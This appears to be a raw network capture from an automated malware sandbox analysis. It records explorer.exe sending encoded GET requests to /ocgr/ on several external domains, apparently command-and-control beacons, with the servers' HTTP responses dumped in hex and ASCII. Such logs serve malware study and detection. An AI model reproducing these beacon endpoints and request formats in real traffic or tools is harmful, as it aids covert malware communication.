                                                                      Jun 5, 2022 13:05:42.100338936 CEST9283INData Raw: 35 34 34 0d 0a 20 2e 62 68 2d 69 6e 70 75 74 73 2e 73 75 62 6d 69 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 0a 09 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 62 68 5f 73 75
                                                                      Data Ascii: 544 .bh-inputs.submit input[type="submit"] {width: 100%;}.bh_subscription_widget form .bh-inputs.email input[type="email"] {min-width: 0;}.bh_subscription_widget form .bh-inputs {margin-bottom: 10px;
                                                                      Jun 5, 2022 13:05:42.100356102 CEST9284INData Raw: 09 09 09 09 09 76 61 72 20 61 6a 61 78 73 63 0d 0a 36 38 0d 0a 72 69 70 74 20 3d 20 7b 61 6a 61 78 5f 75 72 6c 3a 20 27 68 74 74 70 73 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70
                                                                      Data Ascii: var ajaxsc68ript = {ajax_url: 'https://2bsing.com/wp-admin/admin-ajax.php'}$.ajax({type: 'POST',3eaurl: ajaxscript.ajax_url,data: {'action': 'mojo_coming_soon_subscribe','email': email,


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.54985835.201.101.22280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:05:47.317672014 CEST11510OUTGET /ocgr/?1bEX=iHGDCwWI53HcfS+QocK4h8/yIB8fTb9A2eAWw2qT3wOwDe1V57PTmBmkxx0888TI8Tz7&8p=qVwdVxLX0 HTTP/1.1
                                                                      Host: www.ccav11.xyz
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:05:47.620153904 CEST11512INHTTP/1.1 200 OK
                                                                      Server: nginx/1.20.2
                                                                      Date: Sun, 05 Jun 2022 11:05:47 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 5248
                                                                      Last-Modified: Fri, 11 Mar 2022 02:41:55 GMT
                                                                      Vary: Accept-Encoding
                                                                      ETag: "622ab6f3-1480"
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 38 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c
                                                                      Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.28.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
                                                                      Jun 5, 2022 13:05:47.620194912 CEST11513INData Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74
                                                                      Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n|
                                                                      Jun 5, 2022 13:05:47.620224953 CEST11515INData Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63
                                                                      Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
                                                                      Jun 5, 2022 13:05:47.620248079 CEST11515INData Raw: 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72
                                                                      Data Ascii: ntsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("cross
                                                                      Jun 5, 2022 13:05:47.635575056 CEST11516INData Raw: 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 24 73 63 72 69 70 74 31 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65
                                                                      Data Ascii: origin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("cro
                                                                      Jun 5, 2022 13:05:47.635596037 CEST11516INData Raw: 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 31 63 33 37 38 34 31 37 31 39 32 33 30 39 62 30 61 38 32 37 2e 6a 73 22 3e 3c 2f 73
                                                                      Data Ascii: tps://image.uc.cn/s/uae/g/3o/berg/static/archer_index.1c378417192309b0a827.js"></script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.54995234.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:07:57.188816071 CEST14348OUTGET /ocgr/?1bEX=ViYSIEFv5rwMZxE+N77jXoDFxfL0aS1QvzE+hdAgKT25h9AtQBwV2Ju9rwPnKArhVZH3&D8=x2Ml3P6p HTTP/1.1
                                                                      Host: www.engroconnect.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:07:57.303291082 CEST14349INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Sun, 05 Jun 2022 11:07:57 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 291
                                                                      ETag: "6293d166-123"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.549939185.129.100.12780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:06:29.001353979 CEST14292OUTGET /ocgr/?1bEX=aM4AR/Ukf7mSvEjk0rZEh8zH1+Y6GAFwXtGMYQcNHcG0GsWo/Wmk7XSmVo+6tFFOpJhc&8p=qVwdVxLX0 HTTP/1.1
                                                                      Host: www.skb-cabinet.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:06:29.076601982 CEST14292INHTTP/1.1 301 Moved Permanently
                                                                      Server: ddos-guard
                                                                      Connection: close
                                                                      Set-Cookie: __ddg1_=nNmlWjg6QwaJ9RR0jlqQ; Domain=.skb-cabinet.com; HttpOnly; Path=/; Expires=Mon, 05-Jun-2023 11:06:29 GMT
                                                                      Date: Sun, 05 Jun 2022 11:06:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 182
                                                                      Location: http://skb-cabinet.com/ocgr/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.549941185.68.16.17980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:06:39.805007935 CEST14300OUTGET /ocgr/?1bEX=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJicG73GMn4IC&8p=qVwdVxLX0 HTTP/1.1
                                                                      Host: www.mentalnayaarifmetika.online
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:06:39.849564075 CEST14302INHTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Sun, 05 Jun 2022 11:06:39 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 1893
                                                                      Connection: close
                                                                      ETag: "629b66e9-765"
                                                                      x-ray: p988:0.010/wn1005:0.000/
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 63 65 6c 6c 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 34 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 35 32 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: <!doctype html><html><head> <title>403 Forbidden - </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body { background-color: #f1f4f5; color: #37474f; line-height: 1.4; font-family: 'Open Sans', sans-serif; margin: 0; padding: 0; } .error_code { display: block; font-size: 92px; font-weight: 700; margin-top: -25px; } .error_brief { display: block; font-size: 18px; font-weight: 700; margin-bottom: 15px; } </style></head><body><div style="display: table; position: absolute; height: 100%; width: 100%;"> <div style="display: table-cell; vertical-align: middle; padding: 0 40px;"> <div style="margin-left: auto; margin-right: auto; width: 520px;">
                                                                      Jun 5, 2022 13:06:39.849598885 CEST14302INData Raw: 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 6c 65 66 74 3b 20 77 69 64 74 68 3a 32 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 22 3e
                                                                      Data Ascii: <div style="float:left; width:200px; text-align: center; padding-right: 20px;"> <span class="error_code">403</span> <span class="error_description">Forbidden</span> </div> <div style="


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.549943203.170.80.25080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:06:55.560019016 CEST14310OUTGET /ocgr/?8p=qVwdVxLX0&1bEX=lpHABYYuY9cv3qxwBx7M5sV/ehU3dY7dp0OhYiYvhJ7rkfr4y7gNIHxTi8LWiO7UdxYH HTTP/1.1
                                                                      Host: www.exceedrigging.online
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.54994462.149.128.4080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:07:05.906966925 CEST14311OUTGET /ocgr/?8p=qVwdVxLX0&1bEX=/7YxqUa/79bB4G9Fxc9MRqyWJ3uHfA/Cqb47Ix/IG5ItadKvR99PpkoJqdMm4bEwSG/T HTTP/1.1
                                                                      Host: www.ageofcryptos.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:07:05.938211918 CEST14312INHTTP/1.1 404 Not Found
                                                                      Cache-Control: private
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Server: Microsoft-IIS/8.5
                                                                      X-Powered-By: ASP.NET
                                                                      Date: Sun, 05 Jun 2022 11:07:05 GMT
                                                                      Connection: close
                                                                      Content-Length: 5040
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 